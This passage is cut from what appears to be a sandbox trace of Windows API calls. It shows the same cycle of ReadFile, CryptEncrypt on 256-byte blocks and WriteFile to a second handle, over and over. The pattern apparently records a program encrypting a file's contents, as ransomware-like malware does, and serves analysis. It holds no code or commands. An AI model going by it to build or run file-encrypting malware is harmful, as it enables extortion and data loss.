nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.439] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.439] GetLastError () returned 0x0 [0167.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.440] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.440] GetLastError () returned 0x0 [0167.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.441] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.441] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.441] GetLastError () returned 0x0 [0167.441] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.442] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.442] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.442] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.442] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.443] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.443] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.443] GetLastError () returned 0x0 [0167.443] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 